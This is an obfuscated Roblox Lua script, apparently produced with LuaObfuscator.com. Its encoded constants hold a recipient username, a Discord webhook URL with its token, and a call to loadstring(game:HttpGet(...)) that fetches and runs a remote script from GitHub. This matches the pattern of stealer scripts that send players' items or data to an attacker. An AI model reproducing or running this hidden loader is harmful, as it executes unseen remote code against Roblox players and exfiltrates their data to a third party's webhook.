--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v77=v5(v69,v19);v19=nil;return v77;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if (v70==(0 -0)) then v71=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-(620 -((1432 -(282 + 595)) + 64)))) + (932 -(857 + 74)))) ;return v71-(v71%(569 -(367 + (1838 -(1523 + 114))))) ;end end else local v72=2^(v32-(928 -(214 + 713))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(1065 -(68 + (1114 -(32 + 85))))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(1 + (350 -(87 + 263)))) then return (v38 * (1213 -(892 + 65))) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;v36=1 -(180 -(67 + 113)) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;return (v42 * 16777216) + (v41 * (160901 -95365)) + (v40 * (189 + 67)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=3 -2 ;local v46=(v20(v44,953 -(802 + (922 -(201 + 571))) ,(1142 -(116 + 1022)) + 16 ) * (2^(85 -(220 -167)))) + v43 ;local v47=v20(v44,37 -16 ,(483 + 339) -(368 + 423) );local v48=((v20(v44,100 -68 )==(19 -(10 + (29 -21)))) and  -(1 + 0)) or ((1573 -1130) -(416 + 26)) ;if (v47==(859 -(814 + 45))) then if (v46==((0 + 0) -(0 -0))) then return v48 * (997 -(915 + 82)) ;else v47=2 -1 ;v45=0;end elseif (v47==(1193 + 854)) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/(430 -(44 + 21 + 365))))) or (v48 * NaN) ;end return v8(v48,v47-((781 + 1429) -(1069 + 118)) ) * (v45 + (v46/(((4 + 0) -2)^(1538 -(998 + 488))))) ;end local function v25(v49)local v50;if  not v49 then local v73=0;while true do if (v73==(1423 -(630 + 793))) then v49=v23();if (v49==(885 -(261 + (2148 -1524)))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v67=1081 -((2767 -(760 + 987)) + 60) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=413 -(15 + 398) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=3) then else v59=nil;while true do local v78=0;while true do if (v78~=(0 -0)) then else if (v53~=(1990 -(582 + 1408))) then else v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=1;end if (v53==(1 + 0)) then local v101=126 -(116 + 10) ;local v102;while true do if (v101~=(0 -0)) then else v102=0 -0 ;while true do if (v102~=(739 -(542 + 196))) then else local v126=0;while true do if ((0 -0)==v126) then for v149=3 -2 ,v58 do local v150=0;local v151;local v152;local v153;local v154;while true do if (v150==0) then v151=1824 -(1195 + 629) ;v152=nil;v150=1;end if (v150~=(1 + 0)) then else v153=nil;v154=nil;v150=2;end if (v150~=(2 -0)) then else while true do if ((0 -0)==v151) then local v174=0;local v175;while true do if (v174~=(241 -(187 + 54))) then else v175=780 -(162 + 618) ;while true do if (v175~=(0 + 0)) then else v152=0;v153=nil;v175=1;end if (v175==(1 + 0)) then v151=1 -0 ;break;end end break;end end end if (v151~=1) then else v154=nil;while true do if (v152==1) then if (v153==1) then v154=v21()~=0 ;elseif (v153==2) then v154=v24();elseif (v153==3) then v154=v25();end v59[v149]=v154;break;end if (v152==(0 -0)) then local v178=0 -0 ;local v179;local v180;while true do if (v178~=0) then else v179=0;v180=nil;v178=1;end if (v178~=(1 + 0)) then else while true do if (v179~=0) then else v180=1636 -(1373 + 263) ;while true do if ((377 -(142 + 235))~=v180) then else local v187=1000 -(451 + 549) ;while true do if (v187==1) then v180=1 + 0 ;break;end if (v187~=(0 + 0)) then else v153=v21();v154=nil;v187=1 -0 ;end end end if (v180==(1 -0)) then v152=1385 -(746 + 638) ;break;end end break;end end break;end end end end break;end end break;end end end v57[2 + 1 ]=v21();v126=1 -0 ;end if (v126~=(342 -(218 + 123))) then else v102=1583 -(1535 + 46) ;break;end end end if (v102~=2) then else v53=2 + 0 ;break;end if (v102==(0 + 0)) then v58=v23();v59={};v102=2 -1 ;end end break;end end end v78=2 -1 ;end if (v78==(1 + 0)) then if (v53~=(562 -(306 + 254))) then else for v103=1 + 0 ,v23() do local v104=0 -0 ;local v105;while true do if (0~=v104) then else v105=v21();if (v20(v105,1468 -(899 + 568) ,1 + 0 )==(0 -0)) then local v127=603 -(268 + 335) ;local v128;local v129;local v130;local v131;while true do if (v127==(292 -(60 + 230))) then while true do if (v128==3) then if (v20(v130,3 + 0 ,575 -(426 + 146) )==(2 -1)) then v131[1 + 3 ]=v59[v131[4]];end v54[v103]=v131;break;end if (v128~=(1457 -(282 + 1174))) then else local v165=811 -(569 + 242) ;local v166;while true do if (v165==(0 -0)) then v166=1130 -(369 + 761) ;while true do if (v166~=0) then else local v176=0 + 0 ;while true do if ((1 -0)==v176) then v166=1025 -(706 + 318) ;break;end if ((1251 -(721 + 530))==v176) then v131={v22(),v22(),nil,nil};if (v129==(0 + 0)) then local v182=0 + 0 ;local v183;while true do if (v182~=0) then else v183=700 -(271 + 429) ;while true do if (v183==(0 + 0)) then v131[339 -(144 + 192) ]=v22();v131[1504 -(1408 + 92) ]=v22();break;end end break;end end elseif (v129==(1087 -(461 + 625))) then v131[1291 -(993 + 295) ]=v23();elseif (v129==(1 + 1)) then v131[2 + 1 ]=v23() -((1506 -(363 + 1141))^(1187 -(418 + 753))) ;elseif (v129==(2 + 1)) then local v190=0 + 0 ;local v191;while true do if (v190~=(0 -0)) then else v191=0 + 0 ;while true do if (0==v191) then v131[3]=v23() -((1 + 1)^(545 -(406 + 123))) ;v131[3 + 1 ]=v22();break;end end break;end end end v176=1770 -(1749 + 20) ;end end end if (v166==(1976 -(1913 + 62))) then v128=2;break;end end break;end end end if ((0 + 0)==v128) then local v167=1322 -(1249 + 73) ;while true do if (v167==1) then v128=1 + 0 ;break;end if (v167==0) then local v173=1145 -(466 + 679) ;while true do if (v173==(0 -0)) then v129=v20(v105,1663 -(1477 + 184) ,6 -3 );v130=v20(v105,11 -7 ,6 + 0 );v173=1;end if (v173==1) then v167=857 -(564 + 292) ;break;end end end end end if (2~=v128) then else local v168=1900 -(106 + 1794) ;local v169;local v170;while true do if ((1 + 0)==v168) then while true do if (v169~=0) then else v170=0 + 0 ;while true do if (v170~=0) then else local v181=0 -0 ;while true do if (v181~=(0 -0)) then else local v184=114 -(4 + 110) ;while true do if (v184~=(585 -(57 + 527))) then else v181=477 -(41 + 435) ;break;end if (v184~=(1001 -(938 + 63))) then else if (v20(v130,1,1 + 0 )~=(1428 -(41 + 1386))) then else v131[105 -(17 + 86) ]=v59[v131[2]];end if (v20(v130,2 + 0 ,2)==(1 -0)) then v131[8 -5 ]=v59[v131[169 -(122 + 44) ]];end v184=1614 -(1565 + 48) ;end end end if (v181~=(1 -0)) then else v170=3 -2 ;break;end end end if (v170~=(268 -(176 + 91))) then else v128=3 + 0 ;break;end end break;end end break;end if (v168~=(0 + 0)) then else v169=0 -0 ;v170=nil;v168=66 -(30 + 35) ;end end end end break;end if (v127~=(1 + 0)) then else local v147=0 + 0 ;while true do if (v147==(1258 -(1043 + 214))) then v127=7 -5 ;break;end if ((0 -0)==v147) then v130=nil;v131=nil;v147=1;end end end if (v127==(1212 -(323 + 889))) then local v148=1018 -(697 + 321) ;while true do if (v148~=(0 -0)) then else v128=0 -0 ;v129=nil;v148=1 -0 ;end if (v148==(581 -(361 + 219))) then v127=2 -1 ;break;end end end end end break;end end end for v106=321 -(53 + 267) ,v23() do v55[v106-1 ]=v28();end return v57;end break;end end end break;end if (v52==1) then v55=nil;v56=nil;v52=1 + 1 ;end if (v52~=(5 -3)) then else v57=nil;v58=nil;v52=1230 -(322 + 905) ;end if (0~=v52) then else v53=0;v54=nil;v52=1;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (1==v63) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=4) then if (v92<=1) then if (v92>0) then v89[v91[2]]=v91[3]~=0 ;else v89[v91[2]]();end elseif (v92<=2) then do return;end elseif (v92==3) then v89[v91[2]][v91[3]]=v91[4];else local v134=0;local v135;local v136;while true do if (v134==1) then v89[v135 + 1 ]=v136;v89[v135]=v136[v91[4]];break;end if (0==v134) then v135=v91[2];v136=v89[v91[3]];v134=1;end end end elseif (v92<=6) then if (v92==5) then local v109=0;local v110;while true do if (v109==0) then v110=v91[2];v89[v110]=v89[v110](v13(v89,v110 + 1 ,v84));break;end end else local v111;local v112;v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v112=v91[2];v111=v89[v91[3]];v89[v112 + 1 ]=v111;v89[v112]=v111[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];end elseif (v92<=7) then v89[v91[2]]=v91[3];elseif (v92>8) then local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==2) then for v161=v138,v84 do v141=v141 + 1 ;v89[v161]=v139[v141];end break;end if (v137==0) then v138=v91[2];v139,v140=v82(v89[v138](v13(v89,v138 + 1 ,v91[3])));v137=1;end if (v137==1) then v84=(v140 + v138) -1 ;v141=0;v137=2;end end else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;break;end if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D65030F3O004D61737465724A617265643634373903093O00557365724E616D653203053O00357374617203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31303439382O33393330363335363735362F2D4461564B5042384E304A56454D6C4C6A36526857456D494F576A5155714A3665683561626E674930685F4F4E664D472O63496247566E44634E49684744595345747963030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O0012063O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0001000400014O0009000100044O00055O00026O000100012O00023O00017O00",v9(),...);end
